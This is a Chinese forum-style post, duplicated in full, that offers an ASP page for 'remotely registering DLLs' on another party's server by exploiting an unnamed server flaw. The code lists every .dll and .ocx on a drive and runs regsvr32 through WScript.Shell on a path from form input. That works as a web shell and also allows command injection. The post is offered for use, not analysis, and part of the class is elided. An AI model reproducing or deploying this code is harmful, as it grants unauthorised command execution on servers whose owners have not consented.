利用对方服务器漏洞远程注册DLL
利用对方服务器漏洞远程注册DLL
我和朋友一起下载了一个相同的组件,苦于无法注册而没用,但最近我发现他在使用这个组件,显然是已经注册了,好奇怪,他是怎么注册的呢?我问他他不说。
其实,我们在ASP中,是有捷径远程注册DLL的,但需要对方服务器漏洞的“配合”(什么漏洞?我可什么都没说啊,自己看)。试试下面的代码,或许侥幸成功呢:
<% Response.Buffer = True %>
<% Server.ScriptTimeout = 500
Dim frmFolderPath, frmFilePath
frmFolderPath = Request.Form("frmFolderPath")
frmFilePath = Request.Form("frmDllPath")
frmMethod = Request.Form("frmMethod")
btnREG = Request.Form("btnREG")
%>
<HTML>
<HEAD>
<TITLE>精彩春风之远程注册DLL</TITLE>
<STYLE TYPE="TEXT/CSS">
.Legend {FONT-FAMILY: veranda; FONT-SIZE: 14px; FONT-WEIGHT: bold; COLOR: blue}
.FS {FONT-FAMILY: veranda; FONT-SIZE: 12px; BORDER-WIDTH: 4px; BORDER-COLOR: green;
MARGIN-LEFT:2px; MARGIN-RIGHT:2px}
TD {MARGIN-LEFT:6px; MARGIN-RIGHT:6px; PADDING-LEFT:12px; PADDING-RIGHT:12px}
</STYLE>
</HEAD>
<BODY>
<FORM NAME="regForm" METHOD="POST">
<TABLE BORDER=0 CELLSPACING=6 CELLPADDING=6 MARGINWIDTH=6>
<TR>
<TD VALIGN=TOP>
<FIELDSET ID=FS1 NAME=FS1 CLASS=FS>
<LEGEND CLASS=Legend>注册DLL</LEGEND>
敲入到DLL目录的路径
<INPUT TYPE=TEXT NAME="frmFolderPath" VALUE="<%=frmFolderPath%>">
<INPUT TYPE=SUBMIT NAME=btnFileList VALUE="创建文件列表">
<%
IF Request.Form("btnFileList") <> "" OR btnREG <> "" Then
Set RegisterFiles = New clsRegister
RegisterFiles.EchoB("Select File")
Call RegisterFiles.init(frmFolderPath)
RegisterFiles.EchoB("
<INPUT TYPE=SUBMIT NAME=btnREG VALUE=" & Chr(34) _
& "REG/UNREG" & Chr(34) & ">")
IF Request.Form("btnREG") <> "" Then
Call RegisterFiles.Register(frmFilePath, frmMethod)
End IF
Set RegisterFiles = Nothing
End IF
%>
</FIELDSET>
</TD>
</TR>
</TABLE>
</FORM>
</BODY>
</HTML>
<%
Class clsRegister
Private m_oFS
Public Property Let oFS(objOFS)
m_oFS = objOFS
End Property
……
Sub init(strRoot) 'Root to Search (c:, d:, e:)
Dim oDrive, oRootDir
IF oFS.FolderExists(strRoot) Then
IF Len(strRoot) < 3 Then 'Must Be a Drive
Set oDrive = oFS.GetDrive(strRoot)
Set oRootDir = oDrive.RootFolder
Else
Set oRootDir = oFS.GetFolder(strRoot)
End IF
Else
EchoB("噢,文件夹( " & strRoot & " )没找到!")
Exit Sub
End IF
setRoot = oRootDir
Echo("<SELECT NAME=" & Chr(34) & "frmDllPath" & Chr(34) & ">")
Call getAllDlls(oRootDir)
EchoB("</SELECT>")
BuildOptions
End Sub
Sub getAllDlls(oParentFolder)
Dim oSubFolders, oFile, oFiles
Set oSubFolders = oParentFolder.SubFolders
Set opFiles = oParentFolder.Files
For Each oFile in opFiles
IF Right(lCase(oFile.Name), 4) = ".dll" OR Right(lCase(oFile.Name), 4) = ".ocx" Then
Echo("<OPTION VALUE=" & Chr(34) & oFile.Path & Chr(34) & ">" _
& oFile.Name & "</Option>")
End IF
Next
On Error Resume Next
For Each oFolder In oSubFolders 'Iterate All Folders in Drive
Set oFiles = oFolder.Files
For Each oFile in oFiles
IF Right(lCase(oFile.Name), 4) = ".dll" OR Right(lCase(oFile.Name), 4) = ".ocx" Then
Echo("<OPTION VALUE=" & Chr(34) & oFile.Path & Chr(34) & ">" _
& oFile.Name & "</Option>")
End IF
Next
Call getAllDlls(oFolder)
Next
On Error GoTo 0
End Sub
Sub Register(strFilePath, regMethod)
Dim theFile, strFile, oShell, exitcode
Set theFile = oFS.GetFile(strFilePath)
strFile = theFile.Path
Set oShell = CreateObject ("WScript.Shell")
IF regMethod = "REG" Then 'Register
oShell.Run "c:\WINNT\system32\regsvr32.exe /s " & strFile, 0, False
exitcode = oShell.Run("c:\WINNT\system32\regsvr32.exe /s " & strFile, 0, False)
EchoB("regsvr32.exe exitcode = " & exitcode)
Else 'unRegister
oShell.Run "c:\WINNT\system32\regsvr32.exe /u/s " & strFile, 0, False
exitcode = oShell.Run("c:\WINNT\system32\regsvr32.exe /u/s " & strFile, 0, False)
EchoB("regsvr32.exe exitcode = " & exitcode)
End IF
Cleanup oShell
End Sub
Sub BuildOptions
EchoB("Register: <INPUT TYPE=RADIO NAME=frmMethod VALUE=REG CHECKED>")
EchoB("unRegister: <INPUT TYPE=RADIO NAME=frmMethod VALUE=UNREG>")
End Sub
Function Echo(str)
Echo = Response.Write(str & vbCrLf)
End Function
Function EchoB(str)
EchoB = Response.Write(str & "
" & vbCrLf)
End Function
Sub Cleanup(obj)
If isObject(obj) Then
Set obj = Nothing
End IF
End Sub
Sub Class_Terminate()
Cleanup oFS
End Sub
End Class
%>
我和朋友一起下载了一个相同的组件,苦于无法注册而没用,但最近我发现他在使用这个组件,显然是已经注册了,好奇怪,他是怎么注册的呢?我问他他不说。
其实,我们在ASP中,是有捷径远程注册DLL的,但需要对方服务器漏洞的“配合”(什么漏洞?我可什么都没说啊,自己看)。试试下面的代码,或许侥幸成功呢:
<% Response.Buffer = True %>
<% Server.ScriptTimeout = 500
Dim frmFolderPath, frmFilePath
frmFolderPath = Request.Form("frmFolderPath")
frmFilePath = Request.Form("frmDllPath")
frmMethod = Request.Form("frmMethod")
btnREG = Request.Form("btnREG")
%>
<HTML>
<HEAD>
<TITLE>精彩春风之远程注册DLL</TITLE>
<STYLE TYPE="TEXT/CSS">
.Legend {FONT-FAMILY: veranda; FONT-SIZE: 14px; FONT-WEIGHT: bold; COLOR: blue}
.FS {FONT-FAMILY: veranda; FONT-SIZE: 12px; BORDER-WIDTH: 4px; BORDER-COLOR: green;
MARGIN-LEFT:2px; MARGIN-RIGHT:2px}
TD {MARGIN-LEFT:6px; MARGIN-RIGHT:6px; PADDING-LEFT:12px; PADDING-RIGHT:12px}
</STYLE>
</HEAD>
<BODY>
<FORM NAME="regForm" METHOD="POST">
<TABLE BORDER=0 CELLSPACING=6 CELLPADDING=6 MARGINWIDTH=6>
<TR>
<TD VALIGN=TOP>
<FIELDSET ID=FS1 NAME=FS1 CLASS=FS>
<LEGEND CLASS=Legend>注册DLL</LEGEND>
敲入到DLL目录的路径
<INPUT TYPE=TEXT NAME="frmFolderPath" VALUE="<%=frmFolderPath%>">
<INPUT TYPE=SUBMIT NAME=btnFileList VALUE="创建文件列表">
<%
IF Request.Form("btnFileList") <> "" OR btnREG <> "" Then
Set RegisterFiles = New clsRegister
RegisterFiles.EchoB("Select File")
Call RegisterFiles.init(frmFolderPath)
RegisterFiles.EchoB("
<INPUT TYPE=SUBMIT NAME=btnREG VALUE=" & Chr(34) _
& "REG/UNREG" & Chr(34) & ">")
IF Request.Form("btnREG") <> "" Then
Call RegisterFiles.Register(frmFilePath, frmMethod)
End IF
Set RegisterFiles = Nothing
End IF
%>
</FIELDSET>
</TD>
</TR>
</TABLE>
</FORM>
</BODY>
</HTML>
<%
Class clsRegister
Private m_oFS
Public Property Let oFS(objOFS)
m_oFS = objOFS
End Property
……
Sub init(strRoot) 'Root to Search (c:, d:, e:)
Dim oDrive, oRootDir
IF oFS.FolderExists(strRoot) Then
IF Len(strRoot) < 3 Then 'Must Be a Drive
Set oDrive = oFS.GetDrive(strRoot)
Set oRootDir = oDrive.RootFolder
Else
Set oRootDir = oFS.GetFolder(strRoot)
End IF
Else
EchoB("噢,文件夹( " & strRoot & " )没找到!")
Exit Sub
End IF
setRoot = oRootDir
Echo("<SELECT NAME=" & Chr(34) & "frmDllPath" & Chr(34) & ">")
Call getAllDlls(oRootDir)
EchoB("</SELECT>")
BuildOptions
End Sub
Sub getAllDlls(oParentFolder)
Dim oSubFolders, oFile, oFiles
Set oSubFolders = oParentFolder.SubFolders
Set opFiles = oParentFolder.Files
For Each oFile in opFiles
IF Right(lCase(oFile.Name), 4) = ".dll" OR Right(lCase(oFile.Name), 4) = ".ocx" Then
Echo("<OPTION VALUE=" & Chr(34) & oFile.Path & Chr(34) & ">" _
& oFile.Name & "</Option>")
End IF
Next
On Error Resume Next
For Each oFolder In oSubFolders 'Iterate All Folders in Drive
Set oFiles = oFolder.Files
For Each oFile in oFiles
IF Right(lCase(oFile.Name), 4) = ".dll" OR Right(lCase(oFile.Name), 4) = ".ocx" Then
Echo("<OPTION VALUE=" & Chr(34) & oFile.Path & Chr(34) & ">" _
& oFile.Name & "</Option>")
End IF
Next
Call getAllDlls(oFolder)
Next
On Error GoTo 0
End Sub
Sub Register(strFilePath, regMethod)
Dim theFile, strFile, oShell, exitcode
Set theFile = oFS.GetFile(strFilePath)
strFile = theFile.Path
Set oShell = CreateObject ("WScript.Shell")
IF regMethod = "REG" Then 'Register
oShell.Run "c:\WINNT\system32\regsvr32.exe /s " & strFile, 0, False
exitcode = oShell.Run("c:\WINNT\system32\regsvr32.exe /s " & strFile, 0, False)
EchoB("regsvr32.exe exitcode = " & exitcode)
Else 'unRegister
oShell.Run "c:\WINNT\system32\regsvr32.exe /u/s " & strFile, 0, False
exitcode = oShell.Run("c:\WINNT\system32\regsvr32.exe /u/s " & strFile, 0, False)
EchoB("regsvr32.exe exitcode = " & exitcode)
End IF
Cleanup oShell
End Sub
Sub BuildOptions
EchoB("Register: <INPUT TYPE=RADIO NAME=frmMethod VALUE=REG CHECKED>")
EchoB("unRegister: <INPUT TYPE=RADIO NAME=frmMethod VALUE=UNREG>")
End Sub
Function Echo(str)
Echo = Response.Write(str & vbCrLf)
End Function
Function EchoB(str)
EchoB = Response.Write(str & "
" & vbCrLf)
End Function
Sub Cleanup(obj)
If isObject(obj) Then
Set obj = Nothing
End IF
End Sub
Sub Class_Terminate()
Cleanup oFS
End Sub
End Class
%>